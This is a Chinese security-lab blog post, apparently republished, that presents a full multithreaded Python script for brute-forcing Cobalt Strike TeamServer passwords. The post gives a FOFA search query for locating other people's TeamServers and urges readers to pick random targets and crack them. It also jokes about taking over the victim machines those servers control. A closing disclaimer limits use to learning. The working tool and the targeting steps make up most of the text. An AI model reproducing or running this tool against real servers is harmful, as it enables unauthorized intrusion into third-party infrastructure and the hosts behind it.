暂无图片
暂无图片
暂无图片
暂无图片
暂无图片

【燕云工具库】CobaltStrike 密码暴力破解工具

燕云实验室 2021-06-28
1663



“燕云实验室”是河北千诚电子科技有限公司成立的网络安全攻防技术研究实验室。专注于web安全,网络攻防,安全运维,应急溯源方面的研究,开发成果应用于产品核心技术转化,国家重点科技项目攻关。



燕云实验室最近在研究 Cobalt Strike 远程控制时无意中发现一款 Cobalt Strike 口令暴力破解工具,测试发现可控多线程稳定暴力破解 Cobalt Strike 的 TeamServer 密码。



CobaltStrike


Cobalt Strike是一款商业化的渗透测试利器,由著名的攻防专业团队Strategic Cyber开发。该工具被广泛应用于渗透测试项目中,在提高政府和企业网络设施安全性上起到了重要的作用。同时,随着网络空间的红蓝对抗不断发展,该框架成为对手模拟和红队行动中最为流行的一款软件。但由于该框架具备团队协作攻击、流量防检测、防安全软件查杀等优势,因而也被大量黑客组织用于真实的高危害性的攻击。目前已知的多个APT组织都曾经使用过Cobalt Strike攻击框架,如FIN6、Cobalt Group组织和“海莲花”等。但是,目前所披露出来的攻击情报只是黑客利用Cobalt Strike进行非法攻击的冰山一角。由于该框架集成有丰富的逃避流量监测和沙箱检测技术,且具备优秀的反追踪能力,再结合黑客团体积累的免杀技术和C&C隐藏技术,使得业内对Cobalt Strike框架的利用状况知之甚少,也很难有一个全面的了解和清晰的认知。这种情况直接导致大量依赖于Cobalt Strike框架进行的网络攻击行为被忽视或者漏掉,如目前仍然存在许多VT查杀率为0的样本以及因利用C&C隐藏技术而存活至今的控制命令服务器。



Cobalt Strike是由美国Red Team开发,官网地址:

http://cobaltstrike.com



这个工具的社区版是大家熟知的Armitage(一个MSF的图形化界面工具),而Cobalt Strike大家可以理解其为Armitage的商业版。




TeamServer口令暴力破解


然而今天我们并不是介绍和讲解Cobalt Strike的用法,而是关于Cobalt Strike的口令暴力破解。


众所周知Cobalt Strike的工作方式是以TeamServer为核心,可多个Cilent的CS(Server Cilent)架构。


而登录Cobalt Strike的凭证至少需要IP、端口和密码。



而端口[Prot]一般默认都是50050,账户则自定义,那么只要找到目前IP后,即可暴力破解Cobalt Strike的登录密码,一旦破解成功即可登录进去,如果里边有机子——,就可以把它变成自己的机子——(滑稽。


我们先来考虑如何找到别人的Cobalt Strike服务端,首先想到了fofa和shodan,去fofa搜索发现fofa可以直接识别出Cobalt Strike。


fofa搜索  protocol=="cobaltstrike"



数量还是相当可观的,然后随机抽奖几个目标即可。

使用python脚本。


这里FastPwds.txt是我自己的字典。


找到密码后既可登录成功,各位一定要下手轻一点~


脚本源码:

    #!/usr/bin/env python3
    # -*- coding:gbk -*-
    import time
    import socket
    import ssl
    import argparse
    import concurrent.futures
    import sys


    # csbrute.py - Cobalt Strike Team Server Password Brute Forcer


    # https://stackoverflow.com/questions/6224736/how-to-write-python-code-that-is-able-to-properly-require-a-minimal-python-versi


    MIN_PYTHON = (3, 3)
    if sys.version_info < MIN_PYTHON:
    sys.exit("Python %s.%s or later is required.\n" % MIN_PYTHON)


    parser = argparse.ArgumentParser()


    parser.add_argument("host",
    help="Teamserver address")
    parser.add_argument("wordlist", nargs="?",
    help="Newline-delimited word list file")
    parser.add_argument("-p", dest="port", default=50050, type=int,
    help="Teamserver port")
    parser.add_argument("-t", dest="threads", default=25, type=int,
    help="Concurrency level")


    args = parser.parse_args()


    # https://stackoverflow.com/questions/27679890/how-to-handle-ssl-connections-in-raw-python-socket




    class NotConnectedException(Exception):
    def __init__(self, message=None, node=None):
    self.message = message
    self.node = node




    class DisconnectedException(Exception):
    def __init__(self, message=None, node=None):
    self.message = message
    self.node = node




    class Connector:
    def __init__(self):
    self.sock = None
    self.ssl_sock = None
    self.ctx = ssl.SSLContext()
    self.ctx.verify_mode = ssl.CERT_NONE
    pass


    def is_connected(self):
    return self.sock and self.ssl_sock


    def open(self, hostname, port):
    self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    self.sock.settimeout(10)
    self.ssl_sock = self.ctx.wrap_socket(self.sock)


    if hostname == socket.gethostname():
    ipaddress = socket.gethostbyname_ex(hostname)[2][0]
    self.ssl_sock.connect((ipaddress, port))
    else:
    self.ssl_sock.connect((hostname, port))


    def close(self):
    if self.sock:
    self.sock.close()
    self.sock = None
    self.ssl_sock = None


    def send(self, buffer):
    if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")
    self.ssl_sock.sendall(buffer)


    def receive(self):
    if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")
    received_size = 0
    data_buffer = b""


    while received_size < 4:
    data_in = self.ssl_sock.recv()
    data_buffer = data_buffer + data_in
    received_size += len(data_in)


    return data_buffer




    def passwordcheck(password):
    if len(password) > 0:
    result = None
    conn = Connector()
    conn.open(args.host, args.port)
    payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(
    bytes(password, "ascii").ljust(256, b"A"))
    conn.send(payload)
    if conn.is_connected(): result = conn.receive()
    if conn.is_connected(): conn.close()
    if result == bytearray(b"\x00\x00\xca\xfe"):
    return password
    else:
    return False
    else:
    print("Ignored blank password")


    passwords = []


    if args.wordlist:
    print("Wordlist: {}".format(args.wordlist))
    passwords = open(args.wordlist).read().split("\n")
    else:
    print("Wordlist: {}".format("stdin"))
    for line in sys.stdin:
    passwords.append(line.rstrip())


    if len(passwords) > 0:


    print("Word Count: {}".format(len(passwords)))
    print("Threads: {}".format(args.threads))


    start = time.time()


    # https://stackoverflow.com/questions/2846653/how-to-use-threading-in-python


    attempts = 0
    failures = 0


    with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as executor:


    future_to_check = {executor.submit(passwordcheck, password): password for password in passwords}
    for future in concurrent.futures.as_completed(future_to_check):
    password = future_to_check[future]
    try:
    data = future.result()
    attempts = attempts + 1
    if data:
    print("Found Password: {}".format(password))
    except Exception as exc:
    failures = failures + 1
    print('%r generated an exception: %s' % (password, exc))


    print("Attempts: {}".format(attempts))
    print("Failures: {}".format(failures))
    finish = time.time()
    print("Seconds: {:.1f}".format(finish - start))
    print("Attemps per second: {:.1f}".format((failures + attempts) (finish - start)))
    else:
    print("Password(s) required")


    END


    声明


    署名:CC BY-NC-SA 3.0 CN

    文中所涉及的技术,思路和工具仅供以安全为目的的学习交流使用,请勿做非法用途否则后果自负。







    文章转载自燕云实验室,如果涉嫌侵权,请发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

    评论